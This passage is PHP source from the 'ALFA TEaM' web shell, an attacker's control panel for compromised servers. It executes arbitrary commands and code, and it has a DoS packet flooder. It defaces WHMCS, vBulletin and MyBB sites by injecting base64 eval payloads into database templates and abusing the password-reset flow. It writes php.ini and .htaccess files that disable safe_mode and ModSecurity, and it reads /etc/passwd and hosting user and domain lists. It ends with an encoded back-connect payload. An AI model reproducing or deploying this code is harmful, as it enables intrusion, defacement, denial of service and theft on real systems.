      @chdir($_POST['c']);
      if (@is_readable($_POST['alfa1'])) {
        echo '
';
        $code = @highlight_file($_POST['alfa1'], true);
        echo str_replace(array(''), array(''), $code).'
';
      }
      break;
    case 'delete':
      @chdir($_POST['c']);
      if (@is_writable($_POST['alfa1']) || $GLOBALS["glob_chdir_false"]) {
        $deleted = true;
        if (!@unlink($_POST['alfa1'])) {
          $deleted = false;
          if ($alfa_canruncmd) {
            if (_alfa_is_writable($_POST['alfa1'])) {
              alfaEx("rm -f '".addslashes($_POST['alfa1'])."'");
              $deleted = true;
            }
          }
        }
        if ($deleted) {
          echo 'File Deleted...';
        } else {
          echo 'Error...';
        }
      }
      break;
    case 'chmod':
      @chdir($_POST['c']);
      if (!empty($_POST['alfa3'])) {
        $perms = 0;
        for ($i = strlen($_POST['alfa3']) - 1;$i >= 0;--$i) {
          $perms += (int)$_POST['alfa3'][$i] * pow(8, (strlen($_POST['alfa3']) - $i - 1));
        }
        if (!@chmod($_POST['alfa1'], $perms)) {
          if ($chdir_fals && $alfa_canruncmd) {
            alfaEx("cd '".addslashes($_POST["c"])."';chmod ".addslashes($_POST['alfa3'])." '".addslashes($alfa1_decoded)."'");
            echo('Success!');
          } else {
            echo 'Can\'t set permissions!
';
          }
        } else {
          echo('Success!');
        }
      }
      clearstatcache();
      AlfaNum(8, 9, 10, 7, 6, 5, 4, 2, 1);
      if ($chdir_fals) {
        $file_perm = $file_info[5];
      } else {
        $file_perm = substr(sprintf('%o', @fileperms($_POST['alfa1'])), -4);
      }
      echo '
';
      break;
    case 'hexdump':
      @chdir($_POST['c']);
      $c = __read_file($_POST['alfa1']);
      $n = 0;
      $h = array('00000000
','','');
      $len = strlen($c);
      for ($i = 0; $i < $len; ++$i) {
        $h[1] .= sprintf('%02X', ord($c[$i])).' ';
        switch (ord($c[$i])) {
          case 0: $h[2] .= ' ';
            break;
          case 9: $h[2] .= ' ';
            break;
          case 10: $h[2] .= ' ';
            break;
          case 13: $h[2] .= ' ';
            break;
          default: $h[2] .= $c[$i];
            break;
        }
        $n++;
        if ($n == 32) {
          $n = 0;
          if ($i + 1 < $len) {
            $h[0] .= sprintf('%08X', $i + 1).'
';
          }
          $h[1] .= '
';
          $h[2] .= "\n";
        }
      }
      echo '
'.$h[0].'
'.$h[1].'
'.htmlspecialchars($h[2]).'
';
      break;
    case 'rename':
      @chdir($_POST['c']);
      $alfa1_escape = addslashes($_POST["alfa1"]);
      $alfa3_escape = addslashes($_POST["alfa3"]);
      if (!empty($_POST['alfa3'])) {
        $cmd_rename = false;
        if ($chdir_fals && $alfa_canruncmd) {
          if (_alfa_is_writable($_POST['alfa1'])) {
            $alfa1_escape = addslashes($alfa1_decoded);
            alfaEx("cd '".addslashes($_POST['c'])."';mv '".$alfa1_escape."' '".addslashes($_POST['alfa3'])."'");
          } else {
            $cmd_rename = true;
          }
        } else {
          $alfa1_escape = addslashes($_POST["alfa1"]);
        }
        if (!@rename($_POST['alfa1'], $_POST['alfa3']) && $cmd_rename) {
          echo 'Can\'t rename!
';
        } else {
          echo('Renamed!');
          $alfa1_escape = $alfa3_escape;
        }
      }
      echo '
';
      break;
    case 'touch':
      @chdir($_POST['c']);
      if (!empty($_POST['alfa3'])) {
        $time = strtotime($_POST['alfa3']);
        if ($time) {
          $touched = false;
          if ($chdir_fals && $alfa_canruncmd) {
            alfaEx("cd '".addslashes($_POST["c"])."';touch -d '".htmlspecialchars(addslashes($_POST['alfa3']))."' '".addslashes($alfa1_decoded)."'");
            $touched = true;
          }
          if (!@touch($_POST['alfa1'], $time, $time) && !$touched) {
            echo 'Fail!';
          } else {
            echo 'Touched!';
          }
        } else {
          echo 'Bad time format!';
        }
      }
      clearstatcache();
      echo '
';
      break;
    case 'image':
      @chdir($_POST['c']);
      echo('
');
      $file = $_POST['alfa1'];
      $image_info = @getimagesize($file);
      if (is_array($image_info) || $chdir_fals) {
        $width = (int)$image_info[0];
        $height = (int)$image_info[1];
        if ($chdir_fals && $alfa_canruncmd) {
          $source = alfaEx("cat '".addslashes($file)."' | base64");
          list($width, $height) = explode(":", alfaEx("identify -format '%w:%h' '".addslashes($file)."'"));
          $mime = explode(":", alfaEx("file --mime-type '".addslashes($file)."'"));
          $image_info['mime'] = $mime[1];
        } else {
          $source = __ZW5jb2Rlcg(__read_file($file, false));
        }
        $image_info_h = "Image type = [ ".$image_info['mime']." ]
Image Size = [ ".$width." x ".$height." ]
";
        if ($width > 800) {
          $width = 800;
        }
        echo $content = "
".$image_info_h."
".$file."

";
      }
      break;
  }
  echo '';
  alfaFooter();
}
function findicon($file, $type) {
  $s = 'http://solevisible.com/icons/';
  $types = array('json','ppt','pptx','xls','xlsx','msi','config','cgi','pm','c','cpp','cs','java','aspx','asp','db','ttf','eot','woff','woff2','woff','conf','log','apk','cab','bz2','tgz','dmg','izo','jar','7z','iso','rar','bat','sh','alfa','gz','tar','php','php4','php5','phtml','html','xhtml','shtml','htm','zip','png','jpg','jpeg','gif','bmp','ico','txt','js','rb','py','xml','css','sql','htaccess','pl','ini','dll','exe','mp3','mp4','m4a','mov','flv','swf','mkv','avi','wmv','mpg','mpeg','dat','pdf','3gp','doc','docx','docm');
  if ($type != 'file') {
    return ($file == '..' ? $s.'back.png' : $s.'folder.png');
  } else {
    $ext = explode('.', $file);
    $ext = end($ext);
    $ext = strtolower($ext);
    return (in_array($ext, $types) ? $s.$ext.'.png' : $s.'notfound.png');
  }
}
function alfadlfile() {
  if (isset($_POST['c'],$_POST['file'])) {
    $basename = rawurldecode(basename($_POST['file']));
    $_POST['file'] = str_replace("//", "/", $_POST['c'].'/'.$basename);
    $alfa_canruncmd = _alfa_can_runCommand(true, true);
    if (@is_file($_POST['file']) && @is_readable($_POST['file']) || $alfa_canruncmd) {
      ob_start("ob_gzhandler", 4096);
      header("Content-Disposition: attachment; filename=\"".addslashes($basename)."\"");
      header("Content-Type: application/octet-stream");
      if ($GLOBALS["glob_chdir_false"]) {
        $randname = $basename.rand(111, 9999);
        $scriptpath = dirname($_SERVER["SCRIPT_FILENAME"]);
        $filepath = $scriptpath."/".$randname;
        if (_alfa_is_writable($scriptpath)) {
          alfaEx("cp '".addslashes($_POST["file"])."' '".addslashes($filepath)."'");
          readfile($filepath);
          @unlink($filepath);
        } else {
          alfaEx("cat '".addslashes($_POST["file"])."'");
        }
      } else {
        readfile($_POST['file']);
      }
    } else {
      echo('Error...!');
    }
  }
}
function __alfa_set_cookie($key, $value) {
  $_COOKIE[$key] = $value;
  @setcookie($key, $value, time() + (86400 * 7), '/');
}
function alfaphpeval() {
  if (isset($_COOKIE["eval_tmpdir"]) && @is_dir($_COOKIE["eval_tmpdir"])) {
    $tempdir = __ZGVjb2Rlcg($_COOKIE["eval_tmpdir"]);
  } else {
    $tempdir = dirname(alfaEx("mktemp"));
    __alfa_set_cookie("eval_tmpdir", __ZW5jb2Rlcg($tempdir));
  }
  alfahead();
  if (isset($_POST['alfa2']) && ($_POST['alfa2'] == 'ini')) {
    echo '
';
    ob_start();
    $INI = ini_get_all();
    print ''
    .''
    .''
    .''
    .'';
    foreach ($INI as $param => $values) {
      print "\n".''
      .''
      .''
      .''
      .'';
    }
    $tmp = ob_get_clean();
    $tmp = preg_replace('!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU', '', $tmp);
    $tmp = preg_replace('!td, th {(.*)}!msiU', '.e, .v, .h, .h th {$1}', $tmp);
    echo str_replace('
';
  }
  if (isset($_POST['alfa2']) && ($_POST['alfa2'] == 'info')) {
    echo '
';
    ob_start();
    phpinfo();
    $tmp = ob_get_clean();
    $tmp = preg_replace('!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU', '', $tmp);
    $tmp = preg_replace('!td, th {(.*)}!msiU', '.e, .v, .h, .h th {$1}', $tmp);
    echo str_replace('
';
  }
  if (isset($_POST['alfa2']) && ($_POST['alfa2'] == 'exten')) {
    echo '
';
    ob_start();
    $EXT = get_loaded_extensions();
    echo '
ParamGlobal valueLocal ValueAccess
'.$param.''.$values['global_value'].' '.$values['local_value'].' '.$values['access'].' 
'."\n".'
'.implode('
', $EXT).'
'.count($EXT).' extensions loaded';
    echo '

';
  }
  $lang_html = "";
  foreach (array("php" => "php ~> [ Windows / Linux ]","perl" => "perl ~> [ Linux ]","python" => "python ~> [ Linux ]","bash" => "bash ~> [ Linux ]") as $key => $val) {
    $lang_html .= '';
  }
  echo '
| INI_INFO |  | phpinfo | | extensions |

Select Language: 
 '._alfa_load_ace_options("eval").'

'.(!empty($_POST['alfa1']) ? htmlspecialchars($_POST['alfa1']) : "<?php\n\n\techo('hello alfa !');\n\n?>").'
';
  echo '
';
  if (!empty($_POST['alfa1'])) {
    if ($_POST['alfa3'] == "php") {
      ob_start();
      eval('?>'.$_POST['alfa1']);
      $result = htmlspecialchars(ob_get_clean());
    } elseif (_alfa_can_runCommand() && $GLOBALS["sys"] == "unix") {
      $lang = $_POST['alfa3'];
      $filename = "temp".rand(11111, 99999);
      $temp = $tempdir."/".$filename ;
      __write_file($filename, $_POST['alfa1']);
      $result = alfaEx("mv {$filename} {$temp};{$lang} {$temp};rm -f {$temp}");
      @unlink($filename);
      @unlink($temp);
    }
    echo '';
  }
  echo '
';
  alfafooter();
}
function alfahash() {
  if (!function_exists('hex2bin')) {
    function hex2bin($p) {
      return decbin(hexdec($p));
    }
  }
  if (!function_exists('full_urlencode')) {
    function full_urlencode($p) {
      $r = '';
      for ($i = 0;$i < strlen($p);++$i) {
        $r .= '%'.dechex(ord($p[$i]));
      }return strtoupper($r);
    }
  }
  $stringTools = array(
  'Base64_encode ( $string )' => '__ZW5jb2Rlcg($s)',
  'Base64_decode ( $string )' => '__ZGVjb2Rlcg($s)',
  'strrev ( $string )' => 'strrev($s)',
  'bin2hex ( $string )' => 'bin2hex($s)',
  'hex2bin ( $string )' => 'hex2bin($s)',
  'md5 ( $string )' => 'md5($s)',
  'sha1 ( $string )' => 'sha1($s)',
  'hash ( "sha251", $string ) --> sha251' => 'hash("sha256",$s)',
  'hash ( "sha384", $string ) --> sha384' => 'hash("sha384",$s)',
  'hash ( "sha512", $string ) --> sha512' => 'hash("sha512",$s)',
  'crypt ( $string )' => 'crypt($s)',
  'crc32 ( $string )' => 'crc32($s)',
  'str_rot13 ( $string )' => 'str_rot13($s)',
  'urlencode ( $string )' => 'urlencode($s)',
  'urldecode  ( $string )' => 'urldecode($s)',
  'full_urlencode  ( $string )' => 'full_urlencode($s)',
  'htmlspecialchars  ( $string )' => 'htmlspecialchars($s)',
  'base64_encode (gzdeflate( $string , 9)) --> Encode' => '__ZW5jb2Rlcg(gzdeflate($s, 9))',
  'gzinflate (base64_decode( $string )) --> Decode' => '@gzinflate(__ZGVjb2Rlcg($s))',
  'str_rot13 (base64_encode( $string )) --> Encode' => 'str_rot13(__ZW5jb2Rlcg($s))',
  'base64_decode (str_rot13( $string )) --> Decode' => '__ZGVjb2Rlcg(str_rot13($s))',
  'str_rot13 (base64_encode(gzdeflate( $string , 9))) --> Encode' => 'str_rot13(__ZW5jb2Rlcg(gzdeflate($s,9)))',
  'gzinflate (base64_decode(str_rot13( $string ))) --> Decode' => '@gzinflate(__ZGVjb2Rlcg(str_rot13($s)))',
  );
  alfahead();
  echo '
';
  echo "
Method:
  
";
  if (!empty($_POST['alfa1'])) {
    $string = addslashes($_POST['alfa2']);
    $string = str_replace('\"', '"', $string);
    $alg = $_POST['alfa1'];
    $code = str_replace('$s', "'".$string."'", $alg);
    ob_start();
    eval('echo '.$code.';');
    $res = ob_get_contents();
    ob_end_clean();
    if (in_array($alg, $stringTools)) {
      echo '';
    }
  }
  echo "
";
  alfaFooter();
}
function alfados() {
  alfahead();
  echo '
';
  echo '
| DOS |
Method :  Host :  Time :  Port :  

';
  if (!empty($_POST['alfa1']) && !empty($_POST['alfa2']) && !empty($_POST['alfa3'])) {
    echo __pre();
    $packets = 0;
    ignore_user_abort(true);
    $exec_time = (int)$_POST['alfa2'];
    $time = time();
    $max_time = $exec_time + $time;
    $host = $_POST['alfa1'];
    $port = (int)$_POST['alfa3'];
    $method = $_POST['alfa4'];
    $out = str_repeat('X', 65000);
    while (1) {
      $packets++;
      if (time() > $max_time) {
        break;
      }
      $fp = @fsockopen($method.'://'.$host, $port, $errno, $errstr, 5);
      if ($fp) {
        fwrite($fp, $out);
        fclose($fp);
      }
    }
    echo "
$packets (" . @round(($packets * 65) / 1024, 2) . " MB) packets averaging ". @round($packets / $exec_time, 2) . " packets per second
";
    echo "
";
  }
  echo '';
  alfafooter();
}
function __pre() {
  return('
');
}
function alfaIndexChanger() {
  alfahead();

  echo '
| Index Changer |
| Whmcs | | vBulletin | | MyBB | 
';
  if (isset($_POST['alfa3']) && ($_POST['alfa3'] == 'whmcs')) {
    echo __pre();

    echo "
| Whmcs |


".getConfigHtml('whmcs')."

";
    $table = array('td1' =>
     array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'inputName' => 'dbh', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),
     'td2' =>
     array('color' => 'FFFFFF', 'tdName' => 'URL', 'inputName' => 'path', 'inputValue' => 'http://site.com/whmcs', 'inputSize' => '50'),
     'td3' =>
     array('color' => 'FFFFFF', 'tdName' => 'File Name', 'inputName' => 'fname', 'inputValue' => '', 'inputSize' => '50'),
     'td4' =>
     array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'inputName' => 'dbn', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),
     'td5' =>
     array('color' => 'FFFFFF', 'tdName' => 'Db User', 'inputName' => 'dbu', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),
     'td6' =>
     array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'inputName' => 'dbp', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50')
    );
    create_table($table);
    echo "
| Your Index |






";
    if (isset($_POST['alfa6'])) {
      $s0levisible = "Powered By Solevisible";
      $dbu = $_POST['alfa6'];
      $path = $_POST['alfa5'];
      $fname = $_POST['alfa4'];
      $dbn = $_POST['alfa7'];
      $dbp = $_POST['alfa8'];
      $dbh = $_POST['alfa9'];
      $index = $_POST['alfa10'];
      $index = str_replace("\'", "'", $index);
      $deface = '$x = base64_decode("'.__ZW5jb2Rlcg($index).'"); $solevisible = fopen("'.$fname.'","w"); fwrite($solevisible,$x);';
      $saveData = __ZW5jb2Rlcg($deface);
      $Def = '{php}eval(base64_decode("'.$saveData.'"));{/php}';
      if (!empty($dbh) && !empty($dbu) && !empty($dbn) && !empty($index)) {
        $conn = @mysqli_connect($dbh, $dbu, $dbp, $dbn) or die(mysqli_error($conn));
        $soleSave = @mysqli_query($conn, "select message from tblemailtemplates where name='Password Reset Validation'");
        $soleGet = mysqli_fetch_assoc($soleSave);
        $tempSave1 = $soleGet['message'];
        $tempSave = str_replace("'", "\'", $tempSave1);
        $inject = "UPDATE tblemailtemplates SET message='$Def' WHERE name='Password Reset Validation'";
        $result = @mysqli_query($conn, $inject) or die(mysqli_error($conn));
        $create = "insert into tblclients (email) values('solevisible@fbi.gov')";
        $result2 = @mysqli_query($conn, $create) or die(mysqli_error($conn));
        if (function_exists('curl_version')) {
          $AlfaSole = new AlfaCURL(true);
          $saveurl = $AlfaSole->Send($path."/pwreset.php");
          $getToken = preg_match("/name=\"token\" value=\"(.*?)\"/i", $saveurl, $token);
          $AlfaSole->Send($path."/pwreset.php", "post", "token={$token[1]}&action=reset&email=solevisible@fbi.gov");
          $backdata = "UPDATE tblemailtemplates SET message='{$tempSave}' WHERE name='Password Reset Validation'";
          $Solevisible = mysqli_query($conn, $backdata) or die(mysqli_error($conn));
          __alert('File Created...');
          echo "

Click Here !


";
        } else {
          echo "

Please go to Target \" ".$path."/pwreset.php \"
 and reset password with email => solevisible@fbi.gov
and go to \" ".$path."/".$fname." \"


";
        }
      }
    }
  }
  if (isset($_POST['alfa1']) && ($_POST['alfa1'] == 'vb')) {
    echo __pre();

    echo "
| vBulletin |


".getConfigHtml('vb')."
>'); return false;\">
";
    $table = array('td1' =>
     array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'inputName' => 'dbh', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),
     'td2' =>
     array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'inputName' => 'dbn', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),
     'td3' =>
     array('color' => 'FFFFFF', 'tdName' => 'Db User', 'inputName' => 'dbu', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),
     'td4' =>
     array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'inputName' => 'dbp', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50'),
     'td5' =>
     array('color' => 'FFFFFF', 'tdName' => 'Prefix', 'inputName' => 'prefix', 'id' => 'db_prefix', 'inputValue' => '', 'inputSize' => '50')
    );
    create_table($table);
    echo "
| Your Index |





";
    if ($_POST['alfa8'] == '>>') {
      $s0levisible = "Powered By Solevisible";
      $dbu = $_POST['alfa2'];
      $dbn = $_POST['alfa3'];
      $dbp = $_POST['alfa4'];
      $dbh = $_POST['alfa5'];
      $index = $_POST['alfa6'];
      $prefix = $_POST['alfa7'];
      $index = str_replace("\'", "'", $index);
      $set_index = "{\${eval(base64_decode(\'";
      $set_index .= __ZW5jb2Rlcg("echo \"$index\";");
      $set_index .= "\'))}}{\${exit()}}";
      if (!empty($dbh) && !empty($dbu) && !empty($dbn) && !empty($index)) {
        $conn = @mysqli_connect($dbh, $dbu, $dbp, $dbn) or die(mysqli_error($conn));
        $loli1 = "UPDATE ".$prefix."template SET template='".$set_index."".$s0levisible."' WHERE title='spacer_open'";
        $loli2 = "UPDATE ".$prefix."template SET template='".$set_index."".$s0levisible."' WHERE title='FORUMHOME'";
        $loli3 = "UPDATE ".$prefix."style SET css='".$set_index."".$s0levisible."', stylevars='', csscolors='', editorstyles=''";
        @mysqli_query($conn, $loli1) or die(mysqli_error($conn));
        @mysqli_query($conn, $loli2) or die(mysqli_error($conn));
        @mysqli_query($conn, $loli3) or die(mysqli_error($conn));
        __alert('VB index changed...!');
      }
    }
  }
  if (isset($_POST['alfa2']) && ($_POST['alfa2'] == 'mybb')) {
    echo __pre();

    echo "
| Mybb |


".getConfigHtml('mybb')."

";
    $table = array('td1' =>
     array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'inputName' => 'mybbdbh', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),
     'td2' =>
     array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'inputName' => 'mybbdbn', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),
     'td3' =>
     array('color' => 'FFFFFF', 'tdName' => 'Db User', 'inputName' => 'mybbdbu', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),
     'td4' =>
     array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'inputName' => 'mybbdbp', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50')
    );
    create_table($table);
    echo "
| Your Index |



";
    if (isset($_POST['alfa6'])) {
      $mybb_dbh = $_POST['alfa6'];
      $mybb_dbu = $_POST['alfa7'];
      $mybb_dbn = $_POST['alfa8'];
      $mybb_dbp = $_POST['alfa9'];
      $mybb_index = $_POST['alfa10'];
      if (!empty($mybb_dbh) && !empty($mybb_dbu) && !empty($mybb_dbn) && !empty($mybb_index)) {
        $conn = @mysqli_connect($mybb_dbh, $mybb_dbu, $mybb_dbp, $mybb_dbn) or die(mysqli_error($conn));
        $prefix = "mybb_";
        $loli7 = "UPDATE ".$prefix."templates SET template='".$mybb_index."' WHERE title='index'";
        $result = @mysqli_query($conn, $loli7) or die(mysqli_error($conn));
        __alert('MyBB index changed...!');
      }
    }
  }
  echo "
";
  alfafooter();
}
function alfaproc() {
  alfahead();
  echo "

";
  if (empty($_POST['ajax']) && !empty($_POST['alfa1'])) {
    $_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
  }
  if ($GLOBALS['sys'] == "win") {
    $process = array(
    "Task List" => "tasklist /V",
    "System Info" => "systeminfo",
    "Active Connections" => "netstat -an",
    "Running Services" => "net start",
    "User Accounts" => "net user",
    "Show Computers" => "net view",
    "ARP Table" => "arp -a",
    "IP Configuration" => "ipconfig /all"
    );
  } else {
    $process = array(
    "Process status" => "ps aux",
    "Syslog" => "cat /etc/syslog.conf",
    "Resolv" => "cat /etc/resolv.conf",
    "Hosts" => "cat /etc/hosts",
    "Cpuinfo" => "cat /proc/cpuinfo",
    "Version" => "cat /proc/version",
    "Sbin" => "ls -al /usr/sbin",
    "Interrupts" => "cat /proc/interrupts",
    "lsattr" => "lsattr -va",
    "Uptime" => "uptime",
    "Fstab" => "cat /etc/fstab"
    );
  }
  foreach ($process as $n => $link) {
    echo ' | '.$n.' | ';
  }
  echo "

";
  if (!empty($_POST['alfa1'])) {
    echo "
";
    if ($GLOBALS["glob_chdir_false"] && !empty($_POST["c"])) {
      $cmd = "cd '".addslashes($_POST["c"])."';";
    }
    echo alfaEx($cmd.$_POST['alfa1'], true);
    echo '
';
  }
  echo "
";
  alfafooter();
}
function alfasafe() {
  alfahead();
  echo "

| Auto ByPasser |
";
  echo '
| PHP.INI | | .htaccess(apache) | | .htaccess(LiteSpeed) || Read-Passwd | | Read-Users | | Get-User | | Get-Domains | 
';
  if (!empty($_POST['alfa8']) && isset($_POST['alfa8']) == 'domains') {
    if (!_alfa_file_exists("/etc/virtual/domainowners")) {
      echo __pre();
      $solevisible9 = _alfa_file('/etc/named.conf');
      if (is_array($solevisible9)) {
        foreach ($solevisible9 as $solevisible13) {
          if (@eregi('zone', $solevisible13)) {
            preg_match_all('#zone "(.*)"#', $solevisible13, $solevisible14);
            if (strlen(trim($solevisible14[1][0])) > 2) {
              echo $solevisible14[1][0].'
';
            }
          }
        }
      }
    } else {
      echo __pre();
      $users = _alfa_file("/etc/virtual/domainowners");
      if (is_array($users)) {
        foreach ($users as $boz) {
          $dom = explode(":", $boz);
          echo $dom[0]."\n";
        }
      }
    }
  }
  if (!empty($_POST['alfa6']) && isset($_POST['alfa6']) == 'valiases') {
    echo '

Url:  
';
    if (isset($_POST['alfa9']) && $_POST['alfa9'] == '>>') {
      if (!_alfa_file_exists("/etc/virtual/domainowners")) {
        $site = trim($_POST['alfa7']);
        $rep = str_replace(array("https://","http://","www."), "", $site);
        $user = "";
        if (function_exists("posix_getpwuid") && function_exists("fileowner")) {
          if ($user = @posix_getpwuid(@fileowner("/etc/valiases/{$rep}"))) {
            $user = $user['name'];
          }
        } else {
          if (_alfa_can_runCommand(true, true)) {
            $user = alfaEx("stat -c '%U' /etc/valiases/".$rep);
          }
        }
        if (!empty($user) && $user != 'root') {
          echo __pre()."
User: {$user}
site: {$rep}
";
        } else {
          echo __pre().'
No such file or directory Or Disable Functions is not NONE...
';
        }
      } else {
        $site = trim($_POST['alfa7']);
        $rep = str_replace(array("https://","http://","www."), "", $site);
        $users = _alfa_file("/etc/virtual/domainowners");
        foreach ($users as $boz) {
          $ex = explode(":", $boz);
          if ($ex[0] == $rep) {
            echo __pre()."


User: ".trim($ex[1])."


site: {$rep}
";
            break;
          }
        }
      }
    }
  }
  if (!empty($_POST['alfa5']) && isset($_POST['alfa5'])) {
    if (!_alfa_file_exists("/etc/virtual/domainowners")) {
      echo __pre();
      $i = 0;
      while ($i < 60000) {
        $line = @posix_getpwuid($i);
        if (!empty($line)) {
          while (list($key, $vl) = each($line)) {
            echo $vl."\n";
            break;
          }
        }$i++;
      }
    } else {
      echo __pre();
      $users = _alfa_file("/etc/virtual/domainowners");
      foreach ($users as $boz) {
        $user = explode(":", $boz);
        echo trim($user[1]).'
';
      }
    }
  }
  if (!empty($_POST['alfa4']) && isset($_POST['alfa4'])) {
    echo __pre();
    if (_alfa_can_runCommand(true, true)) {
      echo __read_file("/etc/passwd");
    } elseif (function_exists("posix_getpwuid")) {
      for ($uid = 0;$uid < 60000;$uid++) {
        $ara = @posix_getpwuid($uid);
        if (!empty($ara)) {
          while (list($key, $val) = each($ara)) {
            echo "$val:";
          }echo "\n";
        }
      }
    } else {
      __alert('failed...');
    }
  }
  if (!empty($_POST['alfa2']) && isset($_POST['alfa2'])) {
    @__write_file($GLOBALS['cwd'].".htaccess", "#Generated By Sole Sad and Invisible\n\nSec------Engine Off\nSec------ScanPOST Off\n");
    echo '
htaccess for Apache created...!
';
  }
  if (!empty($_POST['alfa1']) && isset($_POST['alfa1'])) {
    @__write_file($GLOBALS['cwd']."php.ini", "safe_mode=OFF\ndisable_functions=ByPassed By Sole Sad & Invisible(ALFA TEaM)");
    echo '
 php.ini created...!
';
  }
  if (!empty($_POST['alfa3']) && isset($_POST['alfa3'])) {
    @__write_file($GLOBALS['cwd'].".htaccess", "#Generated By Sole Sad and Invisible\n\nForceType application/x-httpd-php4\n\n\nSecFilterEngine Off\nSecFilterScanPOST Off\n");
    echo '
htaccess for Litespeed created...!
';
  }
  echo "
";
  alfafooter();
}
function __get_resource($content) {
  return @gzinflate(__ZGVjb2Rlcg($content));
}
function __write_file($file, $content) {
  if ($fh = @fopen($file, "wb")) {
    if (fwrite($fh, $content) !== false) {
      return true;
    }
  }
  return false;
}
function bcinit($evalType, $evalCode, $evalOptions, $evalArguments) {
  $res = "[ Success...! ]";
  $err = "[ Failed...! ]";
  if ($evalOptions != "") {
    $evalOptions = $evalOptions." ";
  }
  if ($evalArguments != "") {
    $evalArguments = " ".$evalArguments;
  }
  if ($evalType == "c") {
    $tmpdir = ALFA_TEMPDIR;
    chdir($tmpdir);
    if (is_writable($tmpdir)) {
      $uniq = substr(md5(time()), 0, 8);
      $filename = $evalType.$uniq.".c";
      $path = $filename;
      if (__write_file($path, $evalCode)) {
        $ext = ($GLOBALS['sys'] == 'win') ? ".exe" : ".out";
        $pathres = $filename.$ext;
        $evalOptions = "-o ".$pathres." ".$evalOptions;
        $cmd = "gcc ".$evalOptions.$path;
        alfaEx($cmd);
        if (is_file($pathres)) {
          if (chmod($pathres, 0755)) {
            $cmd = $pathres.$evalArguments;
            alfaEx($cmd);
          } else {
            $res = $err;
          }
          unlink($pathres);
        } else {
          $res = $err;
        }
        unlink($path);
      } else {
        $res = $err;
      }
    }
    return $res;
  } elseif ($evalType == "java") {
    $tmpdir = ALFA_TEMPDIR;
    chdir($tmpdir);
    if (is_writable($tmpdir)) {
      if (preg_match("/class\ ([^{]+){/i", $evalCode, $r)) {
        $classname = trim($r[1]);
        $filename = $classname;
      } else {
        $uniq = substr(md5(time()), 0, 8);
        $filename = $evalType.$uniq;
        $evalCode = "class ".$filename." { ".$evalCode . " } ";
      }
      $path = $filename.".java";
      if (__write_file($path, $evalCode)) {
        $cmd = "javac ".$evalOptions.$path;
        alfaEx($cmd);
        $pathres = $filename.".class";
        if (is_file($pathres)) {
          if (chmod($pathres, 0755)) {
            $cmd = "java ".$filename.$evalArguments;
            alfaEx($cmd);
          } else {
            $res = $err;
          }
          unlink($pathres);
        } else {
          $res = $err;
        }
        unlink($path);
      } else {
        $res = $err;
      }
    }
    return $res;
  }
  return false;
}
function alfaconnect() {
  alfahead();
  $php = "7VZta9swEP5e6H9QjaE2S5uXfhg0pDBYPw7KVtiHtjOOLNcitqVJ8pKxpb99d36L4zid17WwQV1wrbvTo0e6Oz1hSgnlKSaFMjy9d0bu9PBAM+MZnjAv5gk3hU3MPZ7ImFNuvDDOdOSg1Ta+umdGkxlhKxmLgDkWsQaktOchFL3js7O3OFj6MEizOMYBaw50BAMLUIAJub78+GG2Mkwl06tP49nxrX31+f3F8bR0g206nPN0CJNOuIXTE5z9QN7FoU+umZ8QHbE4Jg/k8AD9PCQOFVlqnIqyS2ZAyyU/Dg8IPLYEgNI3LU05I6saGRzBogFa1oTFmu1BnXSi6pvRXRO5No/vtpfw6SJfomAdZik1XKQeW3FttHMsaWpiLxRqcew2FuIBTN748vSgBzEK74yc4IYBxzjjtru0j5p2KTRfeVANmgeO2wFQUkTe1dlsGGHatVGQC08LuoCa0kx9Y8qxDJXnw+HoNP87t8gp0IeaYUqlovgP8yoiFURZkyKDw9YDclYztenOQj6lTGJcczcQYkQslsBAZ3MYOTKSXpb6CXPcARkBpptv0lrydLMPfMKl4oY5NgV2CdCFtNElHskpsS6sahF8lhGPGZ4oOQKk0Ici2UKqiyLE1ANic3J97orde4lvaORYQxrcEufmy62+e+MOOfYWnpVS7g5ujh1gGYB7U1VtdK69gCsHIgGCRtV3R7QtAGt7r62oTRsYxZPmEduyPEysFov8/En2RnzNIMIlc8jgooWP6AUNHxr7coWTkIi1k4TWxGbGRHNv60ZWaSw0a+WgMtalU2xxbzU059oB1ryvlP/dGZHZRflpSS4ZJM5SFtTZuMOxRMek27G1gFTY5EpQT0iWAstogKtiUXDZjMSUHEGmFdMiUxTYSqyY7d7Hp9Fe8xi6B0UAweCygp7oFTnuHTnpFUlbQWVPGZXt9lJ+QzIRYhaxyIrvgpXbXVO28uss5Tms9lBSbHdCzTFmFO4U5UPkEl8MXqheXS3MU6+xgvL3dCvHmwDggyKO6q42rOqtyorN21HrxwjU2+vDog5+nAp9EovJn7CY/D2Ljl7XXb3eeQEUp73PM97r2S6gvFcrb61p6+YPiEo9Ufa31TNEOSsaPSrvfZbia0v/nknb9LNr207uXrWtib9P2+AHa1910z3UrYeQ6VchexEh008SMv0kIdMvLmS65+Wt/ych0/+EkP2ORV8he2nN+gU=";
